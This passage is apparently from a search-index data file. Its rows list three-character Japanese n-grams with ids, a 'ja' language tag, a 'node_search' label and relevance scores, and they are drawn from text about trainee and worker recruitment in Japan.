('以下の', 155, 'ja', 'node_search', 0.786915),
('以下の', 157, 'ja', 'node_search', 1),
('以下の', 165, 'ja', 'node_search', 1),
('以下の', 167, 'ja', 'node_search', 1),
('以下の', 169, 'ja', 'node_search', 1),
('以下の', 173, 'ja', 'node_search', 1),
('以下の', 176, 'ja', 'node_search', 1),
('以内に', 3, 'ja', 'node_search', 0.610858),
('以来サ', 23, 'ja', 'node_search', 1),
('以降に', 5, 'ja', 'node_search', 1),
('件はあ', 5, 'ja', 'node_search', 0.771698),
('件を提', 24, 'ja', 'node_search', 0.459294),
('任があ', 142, 'ja', 'node_search', 0.668514),
('任感が', 162, 'ja', 'node_search', 0.677939),
('企業の', 27, 'ja', 'node_search', 0.492759),
('企業を', 160, 'ja', 'node_search', 0.800068),
('企業を', 179, 'ja', 'node_search', 0.913226),
('休暇が', 8, 'ja', 'node_search', 2),
('会があ', 135, 'ja', 'node_search', 0.757065),
('会があ', 198, 'ja', 'node_search', 0.934703),
('会が期', 187, 'ja', 'node_search', 0.899454),
('会であ', 174, 'ja', 'node_search', 0.945829),
('会です', 116, 'ja', 'node_search', 1),
('会です', 164, 'ja', 'node_search', 0.968904),
('会です', 171, 'ja', 'node_search', 0.976851),
('会です', 177, 'ja', 'node_search', 0.972861),
('会とな', 192, 'ja', 'node_search', 0.873132),
('会と健', 111, 'ja', 'node_search', 1),
('会にお', 162, 'ja', 'node_search', 0.879565),
('会につ', 1, 'ja', 'node_search', 1),
('会をお', 62, 'ja', 'node_search', 0.519091),
('会をで', 28, 'ja', 'node_search', 1),
('会を得', 194, 'ja', 'node_search', 0.822065),
('会を提', 23, 'ja', 'node_search', 0.550958),
('会を提', 185, 'ja', 'node_search', 0.920273),
('会を最', 116, 'ja', 'node_search', 1),
('会を望', 150, 'ja', 'node_search', 1),
('会社で', 27, 'ja', 'node_search', 0.332581),
('会社と', 26, 'ja', 'node_search', 1),
('会社と', 62, 'ja', 'node_search', 0.779231),
('会社に', 26, 'ja', 'node_search', 1),
('会社の', 9, 'ja', 'node_search', 28),
('会社の', 17, 'ja', 'node_search', 29),
('会社の', 26, 'ja', 'node_search', 27),
('会社の', 27, 'ja', 'node_search', 0.461904),
('会社は', 5, 'ja', 'node_search', 0.879565),
('会社は', 23, 'ja', 'node_search', 1),
('会社は', 27, 'ja', 'node_search', 0.334374),
('会社も', 23, 'ja', 'node_search', 0.703756),
('会社を', 25, 'ja', 'node_search', 1),
('会社寮', 163, 'ja', 'node_search', 0.779231),
('会社情', 23, 'ja', 'node_search', 27),
('会社沿', 27, 'ja', 'node_search', 27),
('会社登', 27, 'ja', 'node_search', 1.89173),
('会話ク', 138, 'ja', 'node_search', 0.754681),
('会話レ', 163, 'ja', 'node_search', 0.731649),
('会話力', 87, 'ja', 'node_search', 0.836446),
('会話方', 28, 'ja', 'node_search', 1),
('伝いが', 1, 'ja', 'node_search', 1),
('伝いし', 62, 'ja', 'node_search', 4),
('伝えし', 3, 'ja', 'node_search', 3.84843),
('伝えて', 133, 'ja', 'node_search', 0.879565),
('伝統に', 3, 'ja', 'node_search', 0.819249),
('伝統に', 122, 'ja', 'node_search', 1.93838),
('位があ', 30, 'ja', 'node_search', 0.945829),
('位と経', 10, 'ja', 'node_search', 1),
('位に立', 24, 'ja', 'node_search', 0.408633),
('位保持', 30, 'ja', 'node_search', 0.848323),
('住する', 3, 'ja', 'node_search', 1),
('住する', 150, 'ja', 'node_search', 1),
('住宅な', 27, 'ja', 'node_search', 0.407276),
('住宅を', 27, 'ja', 'node_search', 1.11464),
('住宅プ', 27, 'ja', 'node_search', 1.44117),
('住宅建', 27, 'ja', 'node_search', 0.383134),
('住宅費', 162, 'ja', 'node_search', 0.71),
('体介護', 162, 'ja', 'node_search', 0.771698),
('体力に', 163, 'ja', 'node_search', 0.699655),
('体系的', 133, 'ja', 'node_search', 0.913226),
('体験を', 135, 'ja', 'node_search', 0.695602),
('何か質', 1, 'ja', 'node_search', 1),
('何事に', 116, 'ja', 'node_search', 1),
('作成サ', 24, 'ja', 'node_search', 0.860547),
('作業員', 27, 'ja', 'node_search', 0.606252),
('作物の', 163, 'ja', 'node_search', 0.913226),
('使える', 24, 'ja', 'node_search', 1),
('使った', 30, 'ja', 'node_search', 1.84234),
('使われ', 23, 'ja', 'node_search', 0.899454),
('使用を', 87, 'ja', 'node_search', 0.757065),
('供させ', 27, 'ja', 'node_search', 0.391056),
('供して', 1, 'ja', 'node_search', 1),
('供して', 23, 'ja', 'node_search', 0.437873),
('供して', 24, 'ja', 'node_search', 0.361759),
('供して', 27, 'ja', 'node_search', 0.480114),
('供して', 136, 'ja', 'node_search', 1),
('供して', 138, 'ja', 'node_search', 0.740689),
('供しま', 62, 'ja', 'node_search', 0.689612),
('供する', 23, 'ja', 'node_search', 0.419117),
('供する', 24, 'ja', 'node_search', 0.456713),
('供する', 27, 'ja', 'node_search', 0.424201),
('供する', 62, 'ja', 'node_search', 0.98493),
('供する', 135, 'ja', 'node_search', 1.6916),
('供する', 185, 'ja', 'node_search', 0.909743),
('供たち', 135, 'ja', 'node_search', 0.896076),
('供を行', 23, 'ja', 'node_search', 1),
('依頼と', 69, 'ja', 'node_search', 0.989021),
('価が行', 142, 'ja', 'node_search', 1),
('価され', 120, 'ja', 'node_search', 0.993146),
('価され', 162, 'ja', 'node_search', 0.854391),
('価格の', 27, 'ja', 'node_search', 0.99205),
('価結果', 29, 'ja', 'node_search', 3),
('係の工', 24, 'ja', 'node_search', 0.585658),
('係を築', 25, 'ja', 'node_search', 1),
('促進し', 135, 'ja', 'node_search', 0.902857),
('促進す', 27, 'ja', 'node_search', 0.314083),
('促進す', 136, 'ja', 'node_search', 0.659351),
('保ちな', 23, 'ja', 'node_search', 0.499853),
('保持者', 3, 'ja', 'node_search', 1.20848),
('保持者', 30, 'ja', 'node_search', 0.845322),
('保持者', 162, 'ja', 'node_search', 1.68961),
('保証し', 136, 'ja', 'node_search', 0.824901),
('信して', 116, 'ja', 'node_search', 1),
('信じて', 69, 'ja', 'node_search', 0.916736),
('信じて', 120, 'ja', 'node_search', 1),
('信のあ', 163, 'ja', 'node_search', 0.691597),
('信を持', 136, 'ja', 'node_search', 0.714225),
('信省の', 9, 'ja', 'node_search', 3),
('信省の', 17, 'ja', 'node_search', 4),
('信頼し', 69, 'ja', 'node_search', 1),
('信頼し', 135, 'ja', 'node_search', 0.676032),
('信頼で', 27, 'ja', 'node_search', 0.497805),
('修と準', 169, 'ja', 'node_search', 1),
('修に参', 95, 'ja', 'node_search', 1),
('修に合', 121, 'ja', 'node_search', 1),
('修をし', 24, 'ja', 'node_search', 1),
('修ビザ', 23, 'ja', 'node_search', 0.446681),
('修了し', 181, 'ja', 'node_search', 1),
('修了し', 183, 'ja', 'node_search', 1),
('修了す', 142, 'ja', 'node_search', 0.848323),
('修了後', 136, 'ja', 'node_search', 0.808176),
('修了時', 62, 'ja', 'node_search', 0.683725),
('修理関', 24, 'ja', 'node_search', 0.613969),
('修生た', 9, 'ja', 'node_search', 3),
('修生た', 17, 'ja', 'node_search', 4),
('修生に', 6, 'ja', 'node_search', 3),
('修生を', 23, 'ja', 'node_search', 0.429413),
('修生達', 20, 'ja', 'node_search', 31),
('修繕工', 27, 'ja', 'node_search', 0.661163),
('個人事', 27, 'ja', 'node_search', 0.338484),
('個人住', 27, 'ja', 'node_search', 0.484898),
('倍とな', 5, 'ja', 'node_search', 1),
('候補生', 156, 'ja', 'node_search', 1.94583),
('候補生', 157, 'ja', 'node_search', 2.83353),
('候補者', 25, 'ja', 'node_search', 2),
('候補者', 138, 'ja', 'node_search', 1),
('候補者', 142, 'ja', 'node_search', 0.774192),
('候補者', 154, 'ja', 'node_search', 1.78691),
('候補者', 165, 'ja', 'node_search', 3.99983),
('候補者', 167, 'ja', 'node_search', 1.81645),
('候補者', 169, 'ja', 'node_search', 4.16849),
('候補者', 173, 'ja', 'node_search', 4.04752),
('候補者', 176, 'ja', 'node_search', 1.74069),
('健康で', 5, 'ja', 'node_search', 0.810915),
('健康で', 18, 'ja', 'node_search', 1),
('健康で', 163, 'ja', 'node_search', 0.705825),
('健康と', 80, 'ja', 'node_search', 1),
('健康に', 77, 'ja', 'node_search', 4),
('健康を', 111, 'ja', 'node_search', 1),
('健康を', 113, 'ja', 'node_search', 1),
('健康保', 8, 'ja', 'node_search', 2),
('側担当', 29, 'ja', 'node_search', 28),
('備えま', 87, 'ja', 'node_search', 0.769219),
('備およ', 162, 'ja', 'node_search', 0.781775),
('備がで', 120, 'ja', 'node_search', 1),
('備が今', 194, 'ja', 'node_search', 0.949597),
('備が今', 197, 'ja', 'node_search', 0.942091),
('備が実', 175, 'ja', 'node_search', 1),
('備が実', 177, 'ja', 'node_search', 0.934703),
('備が実', 178, 'ja', 'node_search', 1),
('備が実', 184, 'ja', 'node_search', 0.945829),
('備が実', 185, 'ja', 'node_search', 1),
('備が実', 187, 'ja', 'node_search', 1),
('備が成', 133, 'ja', 'node_search', 0.740689),
('備と努', 165, 'ja', 'node_search', 0.997306),
('備と学', 179, 'ja', 'node_search', 1),
('備の成', 160, 'ja', 'node_search', 1),
('備の成', 161, 'ja', 'node_search', 1),
('備の成', 168, 'ja', 'node_search', 1),
('備の成', 170, 'ja', 'node_search', 1),
('備の成', 176, 'ja', 'node_search', 1),
('備の成', 186, 'ja', 'node_search', 1),
('備の成', 193, 'ja', 'node_search', 1),
('備の成', 195, 'ja', 'node_search', 1),
('備の積', 190, 'ja', 'node_search', 1),
('備の積', 199, 'ja', 'node_search', 0.976851),
('備をし', 138, 'ja', 'node_search', 1),
('備をし', 140, 'ja', 'node_search', 0.997306),
('備を終', 169, 'ja', 'node_search', 1),
('備を経', 173, 'ja', 'node_search', 1),
('備を経', 174, 'ja', 'node_search', 1),
('備を進', 142, 'ja', 'node_search', 1),
('備作業', 163, 'ja', 'node_search', 0.869951),
('働いて', 69, 'ja', 'node_search', 0.909743),
('働きた', 5, 'ja', 'node_search', 3),
('働きた', 8, 'ja', 'node_search', 2),
('働きた', 10, 'ja', 'node_search', 3),
('働きた', 23, 'ja', 'node_search', 0.601716),
('働きた', 24, 'ja', 'node_search', 1.56511),
('働きた', 26, 'ja', 'node_search', 1),
('働きた', 163, 'ja', 'node_search', 1),
('働きま', 87, 'ja', 'node_search', 0.63167),
('働き専', 24, 'ja', 'node_search', 0.386749),
('働くこ', 144, 'ja', 'node_search', 1),
('働くこ', 147, 'ja', 'node_search', 1),
('働くこ', 155, 'ja', 'node_search', 0.707906),
('働くた', 137, 'ja', 'node_search', 1),
('働くた', 139, 'ja', 'node_search', 1),
('働くた', 143, 'ja', 'node_search', 1),
('働くた', 184, 'ja', 'node_search', 1),
('働くと', 160, 'ja', 'node_search', 1),
('働くと', 166, 'ja', 'node_search', 1),
('働くと', 168, 'ja', 'node_search', 1),
('働くと', 170, 'ja', 'node_search', 1),
('働くと', 180, 'ja', 'node_search', 1),
('働くと', 186, 'ja', 'node_search', 1),
('働くと', 190, 'ja', 'node_search', 1),
('働くと', 191, 'ja', 'node_search', 1),
('働くと', 192, 'ja', 'node_search', 1),
('働くと', 196, 'ja', 'node_search', 1),
('働くと', 199, 'ja', 'node_search', 1),
('働くよ', 87, 'ja', 'node_search', 1),
('働くフ', 18, 'ja', 'node_search', 3),
('働く必', 3, 'ja', 'node_search', 0.648686),
('働く方', 7, 'ja', 'node_search', 1.87924),
('働ける', 162, 'ja', 'node_search', 0.657549),
('働時間', 87, 'ja', 'node_search', 1),
('働者と', 5, 'ja', 'node_search', 3),
('働者と', 27, 'ja', 'node_search', 0.587082),
('働者に', 3, 'ja', 'node_search', 0.545988),
('働者の', 26, 'ja', 'node_search', 1),
('働者は', 3, 'ja', 'node_search', 0.628375),
('働者は', 7, 'ja', 'node_search', 1.79238),
('働者を', 30, 'ja', 'node_search', 28),
('儀正し', 87, 'ja', 'node_search', 0.61241),
('優位に', 24, 'ja', 'node_search', 0.409315),
('優先事', 98, 'ja', 'node_search', 1),
('優先事', 138, 'ja', 'node_search', 0.725015),
('優秀な', 81, 'ja', 'node_search', 4),
('優遇い', 162, 'ja', 'node_search', 0.643484),
('優遇い', 163, 'ja', 'node_search', 0.664818),
('元で練', 24, 'ja', 'node_search', 1),
('元従業', 27, 'ja', 'node_search', 0.652202),
('充実し', 164, 'ja', 'node_search', 0.889397),
('充実し', 167, 'ja', 'node_search', 0.980874),
('充実し', 168, 'ja', 'node_search', 0.839384),
('充実し', 169, 'ja', 'node_search', 0.836446),
('充実し', 170, 'ja', 'node_search', 0.822065),
('充実し', 171, 'ja', 'node_search', 0.889397),
('充実し', 174, 'ja', 'node_search', 0.866793),
('充実し', 175, 'ja', 'node_search', 0.896076),
('充実し', 176, 'ja', 'node_search', 0.848323),
('充実し', 177, 'ja', 'node_search', 0.813674),
('充実し', 184, 'ja', 'node_search', 0.824901),
('充実し', 189, 'ja', 'node_search', 0.78951),
('先事項', 98, 'ja', 'node_search', 0.997306),
('先事項', 138, 'ja', 'node_search', 0.722831),
('先生が', 62, 'ja', 'node_search', 0.972861),
('先生と', 62, 'ja', 'node_search', 1),
('先生達', 24, 'ja', 'node_search', 1),
('先祖を', 69, 'ja', 'node_search', 1),
('先輩を', 87, 'ja', 'node_search', 1),
('光熱費', 163, 'ja', 'node_search', 0.754681),
('克服す', 62, 'ja', 'node_search', 0.800068),
('免許を', 163, 'ja', 'node_search', 0.681785),
('入から', 8, 'ja', 'node_search', 2),
('入して', 27, 'ja', 'node_search', 0.300818),
('入で始', 142, 'ja', 'node_search', 1),
('入れる', 3, 'ja', 'node_search', 1),
('入許可', 23, 'ja', 'node_search', 0.972861),
('入許可', 27, 'ja', 'node_search', 0.343175),
('入販売', 27, 'ja', 'node_search', 0.318506),
('全なフ', 156, 'ja', 'node_search', 1),
('全なフ', 157, 'ja', 'node_search', 1),
('全な旅', 73, 'ja', 'node_search', 1),
('全に減', 87, 'ja', 'node_search', 0.747619),
('全国か', 23, 'ja', 'node_search', 0.63333),
('全国か', 24, 'ja', 'node_search', 1),
('共同語', 24, 'ja', 'node_search', 0.346054),
('内での', 150, 'ja', 'node_search', 1),
('内で高', 155, 'ja', 'node_search', 0.819249),
('内に仕', 3, 'ja', 'node_search', 0.585658),
('内に新', 3, 'ja', 'node_search', 0.609315),
('内外の', 27, 'ja', 'node_search', 0.592848),
('内容が', 6, 'ja', 'node_search', 3),
('円まで', 163, 'ja', 'node_search', 0.819249),
('円以上', 162, 'ja', 'node_search', 0.718502),
('出され', 175, 'ja', 'node_search', 1),
('出され', 177, 'ja', 'node_search', 0.863659),
('出され', 184, 'ja', 'node_search', 0.879565),
('出され', 190, 'ja', 'node_search', 0.931053),
('出まし', 80, 'ja', 'node_search', 1),
('出国報', 156, 'ja', 'node_search', 27),
('出国報', 157, 'ja', 'node_search', 27),
('出席は', 140, 'ja', 'node_search', 0.848323),
('出発い', 156, 'ja', 'node_search', 1.93838),
('出発い', 157, 'ja', 'node_search', 1.83353),
('出発お', 76, 'ja', 'node_search', 4),
('出発お', 113, 'ja', 'node_search', 1),
('出発さ', 154, 'ja', 'node_search', 1),
('出発さ', 164, 'ja', 'node_search', 1.75231),
('出発さ', 165, 'ja', 'node_search', 1.74996),
('出発さ', 167, 'ja', 'node_search', 1.81645),
('出発さ', 169, 'ja', 'node_search', 1.78691),
('出発さ', 171, 'ja', 'node_search', 1.77419),
('出発さ', 173, 'ja', 'node_search', 1.76188),
('出発さ', 174, 'ja', 'node_search', 1.7185),
('出発さ', 175, 'ja', 'node_search', 1.76431),
('出発さ', 176, 'ja', 'node_search', 1.74069),
('出発さ', 177, 'ja', 'node_search', 1.71),
('出発さ', 184, 'ja', 'node_search', 1.75707),
('出発し', 78, 'ja', 'node_search', 1),
('出発し', 111, 'ja', 'node_search', 1),
('出発し', 126, 'ja', 'node_search', 1),
('出発し', 154, 'ja', 'node_search', 0.781775),
('出発し', 156, 'ja', 'node_search', 27),
('出発し', 157, 'ja', 'node_search', 28),
('出発す', 68, 'ja', 'node_search', 1),
('出発す', 140, 'ja', 'node_search', 1),
('出発の', 154, 'ja', 'node_search', 27),
('出発の', 164, 'ja', 'node_search', 27),
('出発の', 165, 'ja', 'node_search', 27),
('出発の', 167, 'ja', 'node_search', 27),
('出発の', 169, 'ja', 'node_search', 27),
('出発の', 171, 'ja', 'node_search', 27),
('出発の', 176, 'ja', 'node_search', 27),
('出発の', 184, 'ja', 'node_search', 27),
('出発は', 165, 'ja', 'node_search', 1),
('出発は', 174, 'ja', 'node_search', 1),
('出発を', 184, 'ja', 'node_search', 1),
('出荷準', 163, 'ja', 'node_search', 0.879565),
('出迎え', 9, 'ja', 'node_search', 3),
('出迎え', 17, 'ja', 'node_search', 4),
('分から', 62, 'ja', 'node_search', 1.18409),
('分けら', 7, 'ja', 'node_search', 1.8861),
('分です', 5, 'ja', 'node_search', 0.736141),
('分な準', 194, 'ja', 'node_search', 0.961087),
('分な準', 197, 'ja', 'node_search', 0.953396),
('分な睡', 87, 'ja', 'node_search', 0.78951),
('分な経', 98, 'ja', 'node_search', 1),
('分にご', 27, 'ja', 'node_search', 0.307493),
('分に合', 23, 'ja', 'node_search', 0.495774),
('分に発', 189, 'ja', 'node_search', 0.916736),
('分の仕', 77, 'ja', 'node_search', 4),
('分の仕', 87, 'ja', 'node_search', 0.648686),
('分らし', 23, 'ja', 'node_search', 0.50505),
('分野で', 3, 'ja', 'node_search', 0.653974),
('分野で', 7, 'ja', 'node_search', 1.8861),
('分野で', 10, 'ja', 'node_search', 2),
('分野で', 169, 'ja', 'node_search', 1),
('分野で', 170, 'ja', 'node_search', 1),
('分野で', 171, 'ja', 'node_search', 1),
('分野で', 178, 'ja', 'node_search', 0.833529),
('分野で', 187, 'ja', 'node_search', 0.942091),
('分野で', 188, 'ja', 'node_search', 1),
('分野で', 189, 'ja', 'node_search', 1),
('分野に', 165, 'ja', 'node_search', 1),
('分野の', 7, 'ja', 'node_search', 1.8861),
('分野の', 155, 'ja', 'node_search', 0.851346),
('分野の', 178, 'ja', 'node_search', 1),
('分野は', 185, 'ja', 'node_search', 0.961087),
('分野特', 155, 'ja', 'node_search', 1),
('切です', 3, 'ja', 'node_search', 0.507159),
('切なス', 182, 'ja', 'node_search', 0.942091),
('切な一', 178, 'ja', 'node_search', 1),
('切な一', 185, 'ja', 'node_search', 1),
('切な一', 193, 'ja', 'node_search', 1),
('切な前', 198, 'ja', 'node_search', 1),
('切な成', 188, 'ja', 'node_search', 1),
('切な成', 190, 'ja', 'node_search', 1),
('切な成', 197, 'ja', 'node_search', 1),
('切な第', 186, 'ja', 'node_search', 0.993146),
('切な第', 187, 'ja', 'node_search', 1),
('切な第', 192, 'ja', 'node_search', 0.953396),
('切な節', 191, 'ja', 'node_search', 0.96498),
('切な語', 133, 'ja', 'node_search', 1),
('切に仕', 69, 'ja', 'node_search', 1),
('切実に', 5, 'ja', 'node_search', 3),
('初にお', 3, 'ja', 'node_search', 1),
('初めて', 9, 'ja', 'node_search', 3),
('初めて', 17, 'ja', 'node_search', 4),
('初回ク', 133, 'ja', 'node_search', 0.953396),
('初心者', 24, 'ja', 'node_search', 0.383134),
('初心者', 62, 'ja', 'node_search', 4),
('別なビ', 7, 'ja', 'node_search', 3.8861),
('利用者', 162, 'ja', 'node_search', 0.976851),
('到着し', 126, 'ja', 'node_search', 1),
('到着す', 142, 'ja', 'node_search', 0.76188),
('到着後', 3, 'ja', 'node_search', 1),
('制の会', 138, 'ja', 'node_search', 0.759465),
('制服付', 155, 'ja', 'node_search', 0.857458),
('則に基', 140, 'ja', 'node_search', 1),
('削減ソ', 27, 'ja', 'node_search', 0.430926),
('前サー', 27, 'ja', 'node_search', 0.399321),
('前向き', 120, 'ja', 'node_search', 0.923838),
('前向き', 194, 'ja', 'node_search', 0.993146),
('前向き', 197, 'ja', 'node_search', 0.98493),
('前進と', 168, 'ja', 'node_search', 1),
('前進と', 170, 'ja', 'node_search', 1),
('前進と', 180, 'ja', 'node_search', 1),
('前進と', 196, 'ja', 'node_search', 1),
('前進と', 198, 'ja', 'node_search', 1),
('前進と', 199, 'ja', 'node_search', 1),
('副大臣', 9, 'ja', 'node_search', 3),
('副大臣', 17, 'ja', 'node_search', 4),
('割を今', 80, 'ja', 'node_search', 1),
('力があ', 191, 'ja', 'node_search', 1),
('力が実', 171, 'ja', 'node_search', 0.949597),
('力して', 23, 'ja', 'node_search', 0.414157),
('力して', 69, 'ja', 'node_search', 1),
('力して', 135, 'ja', 'node_search', 1),
('力して', 136, 'ja', 'node_search', 0.648686),
('力でク', 27, 'ja', 'node_search', 0.421281),
('力と前', 194, 'ja', 'node_search', 1),
('力と前', 197, 'ja', 'node_search', 0.993146),
('力と準', 174, 'ja', 'node_search', 1),
('力と準', 175, 'ja', 'node_search', 1),
('力と準', 177, 'ja', 'node_search', 0.945829),
('力と準', 178, 'ja', 'node_search', 1),
('力と準', 184, 'ja', 'node_search', 0.957226),
('力と準', 185, 'ja', 'node_search', 1),
('力と準', 187, 'ja', 'node_search', 1),
('力と準', 190, 'ja', 'node_search', 1),
('力と熱', 160, 'ja', 'node_search', 1),
('力と熱', 161, 'ja', 'node_search', 1),
('力と熱', 168, 'ja', 'node_search', 1),
('力と熱', 170, 'ja', 'node_search', 1),
('力と熱', 179, 'ja', 'node_search', 1),
('力と熱', 188, 'ja', 'node_search', 1),
('力と熱', 198, 'ja', 'node_search', 1),
('力と粘', 196, 'ja', 'node_search', 1),
('力と継', 166, 'ja', 'node_search', 1),
('力と継', 180, 'ja', 'node_search', 1),
('力と継', 181, 'ja', 'node_search', 1),
('力と継', 192, 'ja', 'node_search', 1),
('力と継', 199, 'ja', 'node_search', 1),
('力に自', 136, 'ja', 'node_search', 0.72066),
('力に自', 163, 'ja', 'node_search', 0.697623),
('力のあ', 18, 'ja', 'node_search', 0.997306),
('力のも', 28, 'ja', 'node_search', 28),
('力の向', 181, 'ja', 'node_search', 1),
('力の向', 182, 'ja', 'node_search', 1.88282),
('力の向', 183, 'ja', 'node_search', 1),
('力の成', 189, 'ja', 'node_search', 1),
('力の高', 23, 'ja', 'node_search', 0.433216),
('力の高', 25, 'ja', 'node_search', 1),
('力の高', 26, 'ja', 'node_search', 1),
('力は報', 140, 'ja', 'node_search', 1),
('力をマ', 62, 'ja', 'node_search', 0.854391),
('力を向', 87, 'ja', 'node_search', 0.830633),
('力を持', 7, 'ja', 'node_search', 28.8861),
('力を磨', 62, 'ja', 'node_search', 0.863659),
('力を積', 182, 'ja', 'node_search', 1),
('力を重', 165, 'ja', 'node_search', 0.98493),
('力を重', 183, 'ja', 'node_search', 1),
('力工学', 10, 'ja', 'node_search', 1),
('力的な', 185, 'ja', 'node_search', 0.896076),
('力試験', 23, 'ja', 'node_search', 0.463662),
('力試験', 24, 'ja', 'node_search', 0.722831),
('力試験', 62, 'ja', 'node_search', 0.567769),
('力試験', 181, 'ja', 'node_search', 1),
('力試験', 182, 'ja', 'node_search', 1),
('力試験', 183, 'ja', 'node_search', 1),
('功した', 133, 'ja', 'node_search', 0.733888),
('功して', 23, 'ja', 'node_search', 0.653974),
('功し続', 80, 'ja', 'node_search', 1),
('功と健', 113, 'ja', 'node_search', 1),
('功と素', 174, 'ja', 'node_search', 0.836446),
('功にと', 197, 'ja', 'node_search', 1),
('功のた', 136, 'ja', 'node_search', 0.681785),
('功の原', 140, 'ja', 'node_search', 1),
('功をお', 180, 'ja', 'node_search', 0.813674),
('功をお', 186, 'ja', 'node_search', 0.781775),
('功をお', 196, 'ja', 'node_search', 0.810915),
('功を期', 140, 'ja', 'node_search', 0.78951),
('功を重', 169, 'ja', 'node_search', 0.913226),
('功を願', 161, 'ja', 'node_search', 0.76431),
('加えて', 27, 'ja', 'node_search', 0.685676),
('加すべ', 3, 'ja', 'node_search', 43),
('加する', 95, 'ja', 'node_search', 1),
('努めて', 87, 'ja', 'node_search', 1),
('努めて', 161, 'ja', 'node_search', 0.819249),
('努力が', 171, 'ja', 'node_search', 0.953396),
('努力が', 191, 'ja', 'node_search', 1),
('努力と', 160, 'ja', 'node_search', 1),
('努力と', 161, 'ja', 'node_search', 1),
('努力と', 166, 'ja', 'node_search', 1),
('努力と', 168, 'ja', 'node_search', 1),
('努力と', 170, 'ja', 'node_search', 1),
('努力と', 174, 'ja', 'node_search', 1),
('努力と', 175, 'ja', 'node_search', 1),
('努力と', 177, 'ja', 'node_search', 0.949597),
('努力と', 178, 'ja', 'node_search', 1),
('努力と', 179, 'ja', 'node_search', 1),
('努力と', 180, 'ja', 'node_search', 1),
('努力と', 181, 'ja', 'node_search', 1),
('努力と', 184, 'ja', 'node_search', 0.961087),
('努力と', 185, 'ja', 'node_search', 1),
('努力と', 187, 'ja', 'node_search', 1),
('努力と', 188, 'ja', 'node_search', 1),
('努力と', 190, 'ja', 'node_search', 1),
('努力と', 192, 'ja', 'node_search', 1),
('努力と', 194, 'ja', 'node_search', 1),
('努力と', 196, 'ja', 'node_search', 1),
('努力と', 197, 'ja', 'node_search', 0.997306),
('努力と', 198, 'ja', 'node_search', 1),
('努力と', 199, 'ja', 'node_search', 1),
('努力の', 189, 'ja', 'node_search', 1),
('努力は', 140, 'ja', 'node_search', 1),
('努力を', 165, 'ja', 'node_search', 0.989021),
('努力を', 182, 'ja', 'node_search', 1),
('努力を', 183, 'ja', 'node_search', 1),
('励して', 133, 'ja', 'node_search', 0.7017),
('励まし', 120, 'ja', 'node_search', 1),
('労に向', 186, 'ja', 'node_search', 0.886095),
('労を支', 154, 'ja', 'node_search', 0.808176),
('労を支', 164, 'ja', 'node_search', 0.771698),
('労を支', 165, 'ja', 'node_search', 0.769219),
('労を支', 167, 'ja', 'node_search', 0.839384),
('労働時', 87, 'ja', 'node_search', 1),
('労働者', 3, 'ja', 'node_search', 1.17601),
('労働者', 5, 'ja', 'node_search', 3),
('労働者', 7, 'ja', 'node_search', 1.79584),
('労働者', 26, 'ja', 'node_search', 1),
('労働者', 27, 'ja', 'node_search', 0.588512),
('労働者', 30, 'ja', 'node_search', 28),
('効果的', 28, 'ja', 'node_search', 1),
('勉さと', 135, 'ja', 'node_search', 0.839384),
('勉強す', 98, 'ja', 'node_search', 1),
('勉強で', 24, 'ja', 'node_search', 0.961087),
('動から', 179, 'ja', 'node_search', 0.863659),
('動に加', 27, 'ja', 'node_search', 0.689612),
('動に熱', 150, 'ja', 'node_search', 1),
('動のサ', 162, 'ja', 'node_search', 0.752312),
('動やキ', 135, 'ja', 'node_search', 1),
('動や筆', 138, 'ja', 'node_search', 1),
('動車の', 23, 'ja', 'node_search', 0.989021),
('動車商', 27, 'ja', 'node_search', 0.350964),
('動車売', 23, 'ja', 'node_search', 1),
('動車販', 27, 'ja', 'node_search', 0.913226),
('務とは', 162, 'ja', 'node_search', 0.997306),
('務まで', 133, 'ja', 'node_search', 1),
('務を促', 27, 'ja', 'node_search', 0.314878),
('務内容', 162, 'ja', 'node_search', 3.17901),
('務内容', 163, 'ja', 'node_search', 3.8289),
('務時間', 5, 'ja', 'node_search', 1),
('務時間', 77, 'ja', 'node_search', 4),
('務時間', 162, 'ja', 'node_search', 0.7017),
('務時間', 163, 'ja', 'node_search', 3.2327),
('務研修', 95, 'ja', 'node_search', 1),
('務経験', 18, 'ja', 'node_search', 1),
('務経験', 198, 'ja', 'node_search', 0.976851),
('募を奨', 133, 'ja', 'node_search', 0.707906),
('募条件', 162, 'ja', 'node_search', 2.77437),
('募条件', 163, 'ja', 'node_search', 2.95363),
('募者を', 135, 'ja', 'node_search', 0.740689),
('募集し', 5, 'ja', 'node_search', 0.786915),
('募集し', 8, 'ja', 'node_search', 2),
('募集し', 10, 'ja', 'node_search', 3),
('募集し', 135, 'ja', 'node_search', 0.733888),
('募集し', 163, 'ja', 'node_search', 1),
('募集の', 163, 'ja', 'node_search', 4),
('募集人', 163, 'ja', 'node_search', 0.655756),
('勢を続', 140, 'ja', 'node_search', 0.961087),
('勢を見', 80, 'ja', 'node_search', 1),
('勤める', 24, 'ja', 'node_search', 1.81367),
('勤勉さ', 135, 'ja', 'node_search', 0.842342),
('勤務と', 162, 'ja', 'node_search', 1),
('勤務地', 162, 'ja', 'node_search', 3.24366),
('勤務地', 163, 'ja', 'node_search', 3.85992),
('勤務時', 5, 'ja', 'node_search', 1),
('勤務時', 77, 'ja', 'node_search', 4),
('勤務時', 162, 'ja', 'node_search', 0.703756),
('勤務時', 163, 'ja', 'node_search', 3.24366),
('勤務経', 18, 'ja', 'node_search', 1),
('包括的', 62, 'ja', 'node_search', 0.896076),
('包括的', 136, 'ja', 'node_search', 1),
('包装作', 163, 'ja', 'node_search', 0.886095),
('化され', 27, 'ja', 'node_search', 0.570448),
('化する', 142, 'ja', 'node_search', 0.923838),
('化など', 24, 'ja', 'node_search', 0.766757),
('化や伝', 122, 'ja', 'node_search', 1),
('化を理', 77, 'ja', 'node_search', 4),
('化を理', 87, 'ja', 'node_search', 1),
('北海道', 68, 'ja', 'node_search', 1),
('北海道', 78, 'ja', 'node_search', 1),
('区の基', 27, 'ja', 'node_search', 0.361229),
('十分だ', 87, 'ja', 'node_search', 0.733888),
('十分で', 5, 'ja', 'node_search', 0.738408),
('十分な', 87, 'ja', 'node_search', 0.792123),
('十分な', 98, 'ja', 'node_search', 1),
('十分な', 194, 'ja', 'node_search', 0.96498),
('十分な', 197, 'ja', 'node_search', 0.957226),
('十分に', 27, 'ja', 'node_search', 0.307872),
('十分に', 189, 'ja', 'node_search', 0.920273),
('卒業し', 18, 'ja', 'node_search', 0.968904),
('卒業し', 62, 'ja', 'node_search', 1),
('卒業生', 24, 'ja', 'node_search', 0.377261),
('卓越し', 116, 'ja', 'node_search', 1),
('卓越し', 120, 'ja', 'node_search', 0.989021),
